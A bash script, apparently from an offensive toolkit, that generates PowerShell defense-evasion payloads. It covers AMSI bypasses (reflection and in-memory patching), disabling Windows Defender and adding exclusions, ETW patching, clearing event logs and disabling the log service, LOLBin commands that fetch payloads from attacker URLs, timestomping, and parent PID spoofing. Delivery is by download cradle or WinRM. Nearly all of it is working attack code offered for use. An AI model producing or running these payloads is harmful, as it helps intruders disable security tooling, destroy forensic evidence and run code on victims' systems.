#!/bin/bash
# Windows Defense Evasion Payload Generator — 7 Techniques
# Generates PowerShell (.ps1) payloads for defense evasion with optional WinRM delivery

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

PAYLOAD_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)/payloads"
mkdir -p "$PAYLOAD_DIR" 2>/dev/null

banner_winevade() {
    echo -e "${RED}"
    echo "  ╔═══════════════════════════════════════════════╗"
    echo "  ║   Windows Defense Evasion Generator            ║"
    echo "  ║   7 MITRE ATT&CK Techniques — PowerShell      ║"
    echo "  ╚═══════════════════════════════════════════════╝"
    echo -e "${NC}"
}

_winrm_deliver() {
    local PS1_FILE="$1"
    local BASENAME
    BASENAME=$(basename "$PS1_FILE")
    echo ""
    echo -e "${YELLOW}═══ Delivery Options ═══${NC}"
    echo -e "  ${CYAN}[1]${NC} Manual transfer"
    echo -e "  ${CYAN}[2]${NC} Python HTTP + download cradle"
    echo -e "  ${CYAN}[3]${NC} Evil-WinRM upload"
    echo -e "  ${CYAN}[4]${NC} WinRM Invoke-Command"
    echo -e "  ${CYAN}[5]${NC} Skip"
    read -p "  Delivery [5]: " DEL; DEL="${DEL:-5}"
    case "$DEL" in
        1) echo -e "${GREEN}[+] Payload: ${PS1_FILE}${NC}"; echo -e "${YELLOW}[*] Run: powershell -ep bypass -f ${BASENAME}${NC}" ;;
        2)
            local LHOST; LHOST=$(ip -4 addr show scope global | awk '/inet /{print $2}' | cut -d/ -f1 | head -1)
            read -p "  IP [${LHOST}]: " IP; IP="${IP:-$LHOST}"
            read -p "  Port [8443]: " PORT; PORT="${PORT:-8443}"
            echo -e "${YELLOW}[*] Server: cd ${PAYLOAD_DIR} && python3 -m http.server ${PORT}${NC}"
            echo -e "${YELLOW}[*] Target: IEX(New-Object Net.WebClient).DownloadString('http://${IP}:${PORT}/${BASENAME}')${NC}"
            read -p "  Start server? [y/N]: " yn
            [[ "$yn" =~ ^[Yy] ]] && { cd "$PAYLOAD_DIR" && python3 -m http.server "$PORT" & disown; echo -e "${GREEN}[+] Serving on :${PORT}${NC}"; }
            ;;
        3)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            echo -e "${YELLOW}[*] evil-winrm -i ${TGT} -u '${TU}' -p '***' then: upload ${PS1_FILE}${NC}"
            ;;
        4)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            local RE="${PAYLOAD_DIR}/winrm_exec.ps1"
            local SC; SC=$(cat "$PS1_FILE")
            cat > "$RE" << PSEOF
\$p = ConvertTo-SecureString '${TP}' -AsPlainText -Force
\$c = New-Object System.Management.Automation.PSCredential('${TU}', \$p)
Invoke-Command -ComputerName '${TGT}' -Credential \$c -ScriptBlock { ${SC} }
PSEOF
            echo -e "${GREEN}[+] WinRM exec script: ${RE}${NC}"
            ;;
        5) echo -e "${GREEN}[+] Saved: ${PS1_FILE}${NC}" ;;
    esac
}

# ──────────────────────────────────────────────
# 1. T1562.001 — AMSI Bypass
# ──────────────────────────────────────────────
gen_amsi() {
    echo -e "${CYAN}[*] T1562.001 — AMSI Bypass (In-Process, No Admin)${NC}"

    echo -e "  Bypass variant:"
    echo -e "  ${CYAN}[1]${NC} Reflection — amsiInitFailed (classic)"
    echo -e "  ${CYAN}[2]${NC} AmsiScanBuffer patch (memory patching)"
    echo -e "  ${CYAN}[3]${NC} Obfuscated reflection (string concat evasion)"
    echo -e "  ${CYAN}[4]${NC} ALL variants in one script"
    read -p "  Variant [4]: " AV; AV="${AV:-4}"

    local OUTFILE="${PAYLOAD_DIR}/win_amsi_bypass.ps1"

    cat > "$OUTFILE" << 'PSEOF'
# T1562.001 — AMSI Bypass Collection
# Generated by D3m0n1z3dShell
# Run BEFORE loading any malicious scripts

function Bypass-AMSI-Reflection {
    # Classic reflection-based amsiInitFailed
    try {
        $a = [Ref].Assembly.GetType(('System.Manage'+'ment.Auto'+'mation.Am'+'siUtils'))
        $f = $a.GetField(('amsiInit'+'Failed'), ('NonPu'+'blic,Static'))
        $f.SetValue($null, $true)
        Write-Host "[+] AMSI Bypass (Reflection): SUCCESS" -ForegroundColor Green
    } catch {
        Write-Host "[-] AMSI Bypass (Reflection): FAILED - $_" -ForegroundColor Red
    }
}

function Bypass-AMSI-Patch {
    # Patch AmsiScanBuffer in memory
    try {
        $w = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@ -Name "Win32" -Namespace "D3m0n" -PassThru

        $amsi = $w::LoadLibrary("am"+"si.dll")
        $addr = $w::GetProcAddress($amsi, "Amsi"+"Scan"+"Buffer")
        $oldProtect = 0
        $w::VirtualProtect($addr, [UIntPtr]6, 0x40, [ref]$oldProtect) | Out-Null
        # xor eax,eax; ret — make AmsiScanBuffer always return S_OK
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr, 0x31)      # xor
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+1, 0xC0)    # eax,eax
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+2, 0x05)    # add eax,
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+3, 0x80)    # 0x80070057 (E_INVALIDARG)
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+4, 0x00)
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+5, 0x07)
        # Actually just ret clean
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr, 0xB8)      # mov eax,
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+1, 0x57)    # 0x80070057
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+2, 0x00)
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+3, 0x07)
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+4, 0x80)
        [System.Runtime.InteropServices.Marshal]::WriteByte($addr+5, 0xC3)    # ret
        $w::VirtualProtect($addr, [UIntPtr]6, $oldProtect, [ref]$oldProtect) | Out-Null
        Write-Host "[+] AMSI Bypass (Patch): SUCCESS" -ForegroundColor Green
    } catch {
        Write-Host "[-] AMSI Bypass (Patch): FAILED - $_" -ForegroundColor Red
    }
}

function Bypass-AMSI-Obfuscated {
    # String concatenation obfuscation to evade static detection
    try {
        $t = "Sys"+"tem.Man"+"agement.Aut"+"omation"
        $a = [Ref].Assembly.GetType("$t.Am"+"si"+"Utils")
        $m = "amsi"+"Init"+"Fai"+"led"
        $f = $a.GetField($m, [System.Reflection.BindingFlags]"NonPublic,Static")
        $f.SetValue($null, $true)
        Write-Host "[+] AMSI Bypass (Obfuscated): SUCCESS" -ForegroundColor Green
    } catch {
        Write-Host "[-] AMSI Bypass (Obfuscated): FAILED - $_" -ForegroundColor Red
    }
}
PSEOF

    case "$AV" in
        1) echo "Bypass-AMSI-Reflection" >> "$OUTFILE" ;;
        2) echo "Bypass-AMSI-Patch" >> "$OUTFILE" ;;
        3) echo "Bypass-AMSI-Obfuscated" >> "$OUTFILE" ;;
        4)
            cat >> "$OUTFILE" << 'PSEOF'

# Try all methods — first success wins
Write-Host "`n[*] Attempting all AMSI bypass methods..." -ForegroundColor Yellow
Bypass-AMSI-Reflection
Bypass-AMSI-Patch
Bypass-AMSI-Obfuscated
Write-Host "`n[*] AMSI bypass complete — load your payloads now" -ForegroundColor Yellow
PSEOF
            ;;
    esac

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 2. T1562.001 — Disable Windows Defender
# ──────────────────────────────────────────────
gen_defender() {
    echo -e "${CYAN}[*] T1562.001 — Disable Windows Defender (Admin Required)${NC}"

    echo -e "  Method:"
    echo -e "  ${CYAN}[1]${NC} Set-MpPreference (PowerShell cmdlet)"
    echo -e "  ${CYAN}[2]${NC} Registry-based disable (survives reboot)"
    echo -e "  ${CYAN}[3]${NC} Add exclusion paths only (stealthier)"
    echo -e "  ${CYAN}[4]${NC} ALL methods"
    read -p "  Method [4]: " DM; DM="${DM:-4}"

    read -p "  Exclusion path [C:\\Users\\Public]: " EXPATH; EXPATH="${EXPATH:-C:\\Users\\Public}"

    local OUTFILE="${PAYLOAD_DIR}/win_defender_disable.ps1"
    cat > "$OUTFILE" << PSEOF
# T1562.001 — Disable Windows Defender
# Generated by D3m0n1z3dShell
# Requires: Administrator
PSEOF

    if [[ "$DM" == "1" || "$DM" == "4" ]]; then
        cat >> "$OUTFILE" << PSEOF

# Method 1: Set-MpPreference
Write-Host "[*] Disabling Defender via Set-MpPreference..." -ForegroundColor Yellow
try {
    Set-MpPreference -DisableRealtimeMonitoring \$true -ErrorAction Stop
    Set-MpPreference -DisableIOAVProtection \$true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableBehaviorMonitoring \$true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableBlockAtFirstSeen \$true -ErrorAction SilentlyContinue
    Set-MpPreference -DisableScriptScanning \$true -ErrorAction SilentlyContinue
    Set-MpPreference -MAPSReporting Disabled -ErrorAction SilentlyContinue
    Set-MpPreference -SubmitSamplesConsent NeverSend -ErrorAction SilentlyContinue
    Write-Host "[+] Defender real-time monitoring disabled" -ForegroundColor Green
} catch {
    Write-Host "[-] MpPreference failed (may need TrustedInstaller): \$_" -ForegroundColor Red
}
PSEOF
    fi

    if [[ "$DM" == "2" || "$DM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Method 2: Registry-based (persistent across reboots)
Write-Host "[*] Disabling Defender via Registry..." -ForegroundColor Yellow
try {
    $regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
    New-Item -Path $regPath -Force -ErrorAction SilentlyContinue | Out-Null
    Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $regPath -Name "DisableAntiVirus" -Value 1 -Type DWord -Force

    $rtPath = "$regPath\Real-Time Protection"
    New-Item -Path $rtPath -Force -ErrorAction SilentlyContinue | Out-Null
    Set-ItemProperty -Path $rtPath -Name "DisableBehaviorMonitoring" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $rtPath -Name "DisableOnAccessProtection" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $rtPath -Name "DisableRealtimeMonitoring" -Value 1 -Type DWord -Force
    Set-ItemProperty -Path $rtPath -Name "DisableScanOnRealtimeEnable" -Value 1 -Type DWord -Force

    Write-Host "[+] Defender disabled via registry (effective after reboot or gpupdate)" -ForegroundColor Green
} catch {
    Write-Host "[-] Registry method failed: $_" -ForegroundColor Red
}
PSEOF
    fi

    if [[ "$DM" == "3" || "$DM" == "4" ]]; then
        cat >> "$OUTFILE" << PSEOF

# Method 3: Add exclusion paths (stealthiest — Defender stays "on" but ignores our paths)
Write-Host "[*] Adding Defender exclusions..." -ForegroundColor Yellow
try {
    Add-MpPreference -ExclusionPath "${EXPATH}" -ErrorAction Stop
    Add-MpPreference -ExclusionPath "\$env:TEMP" -ErrorAction SilentlyContinue
    Add-MpPreference -ExclusionPath "\$env:APPDATA" -ErrorAction SilentlyContinue
    Add-MpPreference -ExclusionExtension ".ps1",".exe",".dll",".bat" -ErrorAction SilentlyContinue
    Add-MpPreference -ExclusionProcess "powershell.exe","cmd.exe","rundll32.exe" -ErrorAction SilentlyContinue
    Write-Host "[+] Exclusions added — Defender will ignore our paths/extensions/processes" -ForegroundColor Green
    Write-Host "[*] Exclusions: ${EXPATH}, \$env:TEMP, \$env:APPDATA, .ps1/.exe/.dll/.bat" -ForegroundColor Yellow
} catch {
    Write-Host "[-] Exclusion failed: \$_" -ForegroundColor Red
}
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 3. T1562.006 — ETW Patching
# ──────────────────────────────────────────────
gen_etw() {
    echo -e "${CYAN}[*] T1562.006 — ETW Patching (Blind .NET Telemetry, No Admin)${NC}"

    local OUTFILE="${PAYLOAD_DIR}/win_etw_patch.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1562.006 — ETW Patching (Event Tracing Blinding)
# Generated by D3m0n1z3dShell
# Patches ntdll!EtwEventWrite to return immediately — blinds .NET ETW

Write-Host "[*] Patching ETW (ntdll!EtwEventWrite)..." -ForegroundColor Yellow

$ntdll = Add-Type -MemberDefinition @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@ -Name "NtDll" -Namespace "D3m0n_ETW" -PassThru

$hNtdll = $ntdll::GetModuleHandle("ntdll.dll")
$addr = $ntdll::GetProcAddress($hNtdll, "EtwEventWrite")

if ($addr -eq [IntPtr]::Zero) {
    Write-Host "[-] Could not find EtwEventWrite" -ForegroundColor Red
    exit 1
}

$oldProtect = 0
$ntdll::VirtualProtect($addr, [UIntPtr]1, 0x40, [ref]$oldProtect) | Out-Null

# Write 'ret' (0xC3) to make EtwEventWrite return immediately
[System.Runtime.InteropServices.Marshal]::WriteByte($addr, 0xC3)

$ntdll::VirtualProtect($addr, [UIntPtr]1, $oldProtect, [ref]$oldProtect) | Out-Null

Write-Host "[+] ETW patched — EtwEventWrite now returns immediately" -ForegroundColor Green
Write-Host "[*] .NET telemetry (Script Block Logging, etc.) is now blind for this process" -ForegroundColor Yellow
Write-Host "[*] Note: Only affects current process. New PowerShell sessions need re-patching." -ForegroundColor Yellow
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 4. T1070.001 — Event Log Clearing
# ──────────────────────────────────────────────
gen_evtclear() {
    echo -e "${CYAN}[*] T1070.001 — Event Log Clearing (Admin Required)${NC}"

    echo -e "  Mode:"
    echo -e "  ${CYAN}[1]${NC} Clear ALL event logs"
    echo -e "  ${CYAN}[2]${NC} Selective (Security, System, PowerShell, Sysmon)"
    echo -e "  ${CYAN}[3]${NC} Disable event log service"
    echo -e "  ${CYAN}[4]${NC} ALL of the above"
    read -p "  Mode [1]: " EM; EM="${EM:-1}"

    local OUTFILE="${PAYLOAD_DIR}/win_evtclear.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1070.001 — Event Log Clearing
# Generated by D3m0n1z3dShell
# Requires: Administrator
PSEOF

    if [[ "$EM" == "1" || "$EM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Clear ALL event logs
Write-Host "[*] Clearing all event logs..." -ForegroundColor Yellow
$logs = Get-WinEvent -ListLog * -ErrorAction SilentlyContinue
$count = 0
foreach ($log in $logs) {
    try {
        [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($log.LogName)
        $count++
    } catch {}
}
Write-Host "[+] Cleared $count event logs" -ForegroundColor Green
PSEOF
    fi

    if [[ "$EM" == "2" || "$EM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Selective clearing
Write-Host "[*] Clearing targeted logs..." -ForegroundColor Yellow
$targets = @("Security", "System", "Application",
    "Microsoft-Windows-PowerShell/Operational",
    "Microsoft-Windows-Sysmon/Operational",
    "Windows PowerShell")
foreach ($t in $targets) {
    try {
        wevtutil cl $t 2>$null
        Write-Host "  [+] Cleared: $t" -ForegroundColor Green
    } catch {
        Write-Host "  [-] Failed: $t" -ForegroundColor Red
    }
}
PSEOF
    fi

    if [[ "$EM" == "3" || "$EM" == "4" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Disable Windows Event Log service
Write-Host "[*] Disabling event log service..." -ForegroundColor Yellow
try {
    Stop-Service -Name "EventLog" -Force -ErrorAction Stop
    Set-Service -Name "EventLog" -StartupType Disabled
    Write-Host "[+] Event Log service disabled" -ForegroundColor Green
} catch {
    # Often fails due to dependencies — use sc instead
    sc.exe config EventLog start= disabled 2>$null
    net stop EventLog 2>$null
    Write-Host "[*] Attempted via sc.exe (may require reboot)" -ForegroundColor Yellow
}

# Also clear PowerShell history
$histPath = (Get-PSReadLineOption).HistorySavePath
if (Test-Path $histPath) {
    Remove-Item $histPath -Force
    Write-Host "[+] PowerShell history cleared" -ForegroundColor Green
}
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 5. T1218 — LOLBin Proxy Execution
# ──────────────────────────────────────────────
gen_lolbin() {
    echo -e "${CYAN}[*] T1218 — Signed Binary Proxy Execution (LOLBins)${NC}"

    echo -e "  LOLBin:"
    echo -e "  ${CYAN}[1]${NC} mshta — HTA execution (T1218.005)"
    echo -e "  ${CYAN}[2]${NC} rundll32 — JavaScript proxy (T1218.011)"
    echo -e "  ${CYAN}[3]${NC} regsvr32 — Squiblydoo .sct (T1218.010)"
    echo -e "  ${CYAN}[4]${NC} certutil — Download + decode (T1218)"
    echo -e "  ${CYAN}[5]${NC} msiexec — Remote MSI (T1218.007)"
    echo -e "  ${CYAN}[6]${NC} Generate ALL"
    read -p "  LOLBin [6]: " LB; LB="${LB:-6}"

    local OUTFILE="${PAYLOAD_DIR}/win_lolbin.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1218 — LOLBin Proxy Execution Commands
# Generated by D3m0n1z3dShell
# These use signed Microsoft binaries to execute payloads (bypass AppLocker/WDAC)

Write-Host "=== LOLBin Proxy Execution ===" -ForegroundColor Cyan
PSEOF

    if [[ "$LB" == "1" || "$LB" == "6" ]]; then
        read -p "  mshta payload URL (or inline VBScript) [http://attacker/payload.hta]: " MURL
        MURL="${MURL:-http://attacker/payload.hta}"
        cat >> "$OUTFILE" << PSEOF

# 1. mshta.exe — Execute HTA from URL
Write-Host "`n[1] mshta.exe (T1218.005)" -ForegroundColor Yellow
Write-Host "    mshta ${MURL}" -ForegroundColor White
Write-Host '    mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -w hidden -c <CMD>"", 0:close")' -ForegroundColor White
# Start-Process mshta -ArgumentList "${MURL}" -WindowStyle Hidden
PSEOF
    fi

    if [[ "$LB" == "2" || "$LB" == "6" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# 2. rundll32.exe — JavaScript execution
Write-Host "`n[2] rundll32.exe (T1218.011)" -ForegroundColor Yellow
Write-Host '    rundll32 javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -w hidden -c <CMD>")' -ForegroundColor White
PSEOF
    fi

    if [[ "$LB" == "3" || "$LB" == "6" ]]; then
        read -p "  regsvr32 .sct URL [http://attacker/payload.sct]: " SURL
        SURL="${SURL:-http://attacker/payload.sct}"
        cat >> "$OUTFILE" << PSEOF

# 3. regsvr32.exe — Squiblydoo
Write-Host "\`n[3] regsvr32.exe Squiblydoo (T1218.010)" -ForegroundColor Yellow
Write-Host "    regsvr32 /s /n /u /i:${SURL} scrobj.dll" -ForegroundColor White

# Generate .sct template
\$sctContent = @"
<?XML version="1.0"?>
<scriptlet>
<registration progid="D3m0n" classid="{F0001111-0000-0000-0000-000000000001}">
<script language="JScript">
<![CDATA[ new ActiveXObject("WScript.Shell").Run("powershell -ep bypass -w hidden -c <INSERT_CMD>"); ]]>
</script>
</registration>
</scriptlet>
"@
Write-Host "[*] Host this .sct file on your web server" -ForegroundColor Yellow
Write-Host \$sctContent -ForegroundColor Gray
PSEOF
    fi

    if [[ "$LB" == "4" || "$LB" == "6" ]]; then
        read -p "  certutil download URL [http://attacker/payload.exe]: " CURL
        CURL="${CURL:-http://attacker/payload.exe}"
        cat >> "$OUTFILE" << PSEOF

# 4. certutil.exe — Download and decode
Write-Host "\`n[4] certutil.exe (T1218)" -ForegroundColor Yellow
Write-Host "    certutil -urlcache -split -f ${CURL} C:\\Users\\Public\\update.exe" -ForegroundColor White
Write-Host "    certutil -decode encoded.txt decoded.exe" -ForegroundColor White
# Execution:
# certutil -urlcache -split -f "${CURL}" "\$env:Public\\update.exe"
# Start-Process "\$env:Public\\update.exe" -WindowStyle Hidden
PSEOF
    fi

    if [[ "$LB" == "5" || "$LB" == "6" ]]; then
        read -p "  MSI URL [http://attacker/payload.msi]: " MSIURL
        MSIURL="${MSIURL:-http://attacker/payload.msi}"
        cat >> "$OUTFILE" << PSEOF

# 5. msiexec.exe — Remote MSI
Write-Host "\`n[5] msiexec.exe (T1218.007)" -ForegroundColor Yellow
Write-Host "    msiexec /q /i ${MSIURL}" -ForegroundColor White
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 6. T1070.006 — Timestomping
# ──────────────────────────────────────────────
gen_timestomp() {
    echo -e "${CYAN}[*] T1070.006 — Timestomping${NC}"

    echo -e "  Mode:"
    echo -e "  ${CYAN}[1]${NC} Copy timestamps from a legit system file"
    echo -e "  ${CYAN}[2]${NC} Set specific date/time"
    echo -e "  ${CYAN}[3]${NC} Randomize within range"
    read -p "  Mode [1]: " TM; TM="${TM:-1}"

    local OUTFILE="${PAYLOAD_DIR}/win_timestomp.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1070.006 — Timestomping
# Generated by D3m0n1z3dShell
PSEOF

    case "$TM" in
        1)
            read -p "  Reference file [C:\\Windows\\System32\\svchost.exe]: " RFILE
            RFILE="${RFILE:-C:\\Windows\\System32\\svchost.exe}"
            cat >> "$OUTFILE" << PSEOF

# Copy timestamps from legitimate file
\$target = Read-Host "Target file to timestomp"
\$ref = Get-Item "${RFILE}" -Force
\$t = Get-Item \$target -Force
\$t.CreationTime = \$ref.CreationTime
\$t.LastWriteTime = \$ref.LastWriteTime
\$t.LastAccessTime = \$ref.LastAccessTime
Write-Host "[+] Timestamps copied from ${RFILE} to \$target" -ForegroundColor Green
Write-Host "    Created:  \$(\$t.CreationTime)" -ForegroundColor White
Write-Host "    Modified: \$(\$t.LastWriteTime)" -ForegroundColor White
Write-Host "    Accessed: \$(\$t.LastAccessTime)" -ForegroundColor White
PSEOF
            ;;
        2)
            read -p "  Date/Time [01/15/2021 08:30:00]: " DT
            DT="${DT:-01/15/2021 08:30:00}"
            cat >> "$OUTFILE" << PSEOF

# Set specific timestamp
\$target = Read-Host "Target file to timestomp"
\$dt = [DateTime]"${DT}"
\$t = Get-Item \$target -Force
\$t.CreationTime = \$dt
\$t.LastWriteTime = \$dt
\$t.LastAccessTime = \$dt
Write-Host "[+] Timestamps set to ${DT}" -ForegroundColor Green
PSEOF
            ;;
        3)
            cat >> "$OUTFILE" << 'PSEOF'

# Random timestamp within plausible range
$target = Read-Host "Target file to timestomp"
$start = [DateTime]"01/01/2019"
$end = [DateTime]"12/31/2023"
$range = ($end - $start).Days
$randDate = $start.AddDays((Get-Random -Minimum 0 -Maximum $range)).AddHours((Get-Random -Minimum 6 -Maximum 20)).AddMinutes((Get-Random -Minimum 0 -Maximum 59))
$t = Get-Item $target -Force
$t.CreationTime = $randDate
$t.LastWriteTime = $randDate.AddDays((Get-Random -Minimum 1 -Maximum 30))
$t.LastAccessTime = (Get-Date).AddDays(-(Get-Random -Minimum 1 -Maximum 7))
Write-Host "[+] Timestamps randomized" -ForegroundColor Green
Write-Host "    Created:  $($t.CreationTime)" -ForegroundColor White
Write-Host "    Modified: $($t.LastWriteTime)" -ForegroundColor White
PSEOF
            ;;
    esac

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 7. T1134.004 — Parent PID Spoofing
# ──────────────────────────────────────────────
gen_ppid() {
    echo -e "${CYAN}[*] T1134.004 — Parent PID Spoofing (Admin Required)${NC}"

    read -p "  Spoofed parent process [explorer.exe]: " PPARENT; PPARENT="${PPARENT:-explorer.exe}"
    read -p "  Child process to spawn [powershell.exe]: " PCHILD; PCHILD="${PCHILD:-powershell.exe}"
    read -p "  Child arguments [-w hidden -ep bypass -c Write-Host pwned]: " PARGS
    PARGS="${PARGS:--w hidden -ep bypass -c Write-Host pwned}"

    local OUTFILE="${PAYLOAD_DIR}/win_ppid_spoof.ps1"
    cat > "$OUTFILE" << PSEOF
# T1134.004 — Parent PID Spoofing
# Generated by D3m0n1z3dShell
# Spawns a process as a child of a spoofed parent
# Requires: Administrator (SeDebugPrivilege)

\$parentName = "${PPARENT}"
\$childPath = "${PCHILD}"
\$childArgs = "${PARGS}"

# Find parent process
\$parent = Get-Process -Name (\$parentName -replace '\.exe$','') -ErrorAction SilentlyContinue | Select-Object -First 1
if (-not \$parent) {
    Write-Host "[-] Parent process '\$parentName' not found" -ForegroundColor Red
    exit 1
}

Write-Host "[*] Spoofing parent: \$(\$parent.ProcessName) (PID: \$(\$parent.Id))" -ForegroundColor Yellow

# C# P/Invoke for CreateProcess with STARTUPINFOEX
\$code = @"
using System;
using System.Runtime.InteropServices;

public class PPIDSpoof {
    [DllImport("kernel32.dll")]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine,
        IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles,
        uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll")]
    public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList,
        uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize,
        IntPtr lpPreviousValue, IntPtr lpReturnSize);

    [DllImport("kernel32.dll")]
    public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList,
        int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

    public const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
    public const uint CREATE_NO_WINDOW = 0x08000000;
    public const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION {
        public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFO {
        public int cb; public IntPtr lpReserved; public IntPtr lpDesktop; public IntPtr lpTitle;
        public int dwX; public int dwY; public int dwXSize; public int dwYSize;
        public int dwXCountChars; public int dwYCountChars; public int dwFillAttribute;
        public int dwFlags; public short wShowWindow; public short cbReserved2;
        public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX {
        public STARTUPINFO StartupInfo; public IntPtr lpAttributeList;
    }

    public static int Spoof(int parentPid, string childPath, string childArgs) {
        IntPtr hParent = OpenProcess(0x1F0FFF, false, parentPid);
        if (hParent == IntPtr.Zero) return -1;

        IntPtr lpSize = IntPtr.Zero;
        InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
        IntPtr lpAttributeList = Marshal.AllocHGlobal(lpSize);
        InitializeProcThreadAttributeList(lpAttributeList, 1, 0, ref lpSize);

        IntPtr lpValue = Marshal.AllocHGlobal(IntPtr.Size);
        Marshal.WriteIntPtr(lpValue, hParent);
        UpdateProcThreadAttribute(lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
            lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

        STARTUPINFOEX si = new STARTUPINFOEX();
        si.StartupInfo.cb = Marshal.SizeOf(si);
        si.lpAttributeList = lpAttributeList;

        PROCESS_INFORMATION pi;
        string cmd = childPath + " " + childArgs;
        bool success = CreateProcess(childPath, cmd, IntPtr.Zero, IntPtr.Zero, false,
            EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out pi);

        return success ? pi.dwProcessId : -1;
    }
}
"@

Add-Type -TypeDefinition \$code -Language CSharp

\$pid = [PPIDSpoof]::Spoof(\$parent.Id, \$childPath, \$childArgs)
if (\$pid -gt 0) {
    Write-Host "[+] Spawned \$childPath (PID: \$pid) as child of \$(\$parent.ProcessName) (PID: \$(\$parent.Id))" -ForegroundColor Green
    Write-Host "[*] In Task Manager, this appears as a legitimate child of \$parentName" -ForegroundColor Yellow
} else {
    Write-Host "[-] PPID spoofing failed" -ForegroundColor Red
}
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# Main Menu
# ──────────────────────────────────────────────
main() {
    banner_winevade

    echo -e "  ${CYAN}[1]${NC} AMSI Bypass (T1562.001) ${RED}★ Run First${NC}"
    echo -e "  ${CYAN}[2]${NC} Disable Windows Defender (T1562.001)"
    echo -e "  ${CYAN}[3]${NC} ETW Patching — Blind Telemetry (T1562.006)"
    echo -e "  ${CYAN}[4]${NC} Event Log Clearing (T1070.001)"
    echo -e "  ${CYAN}[5]${NC} LOLBin Proxy Execution (T1218)"
    echo -e "  ${CYAN}[6]${NC} Timestomping (T1070.006)"
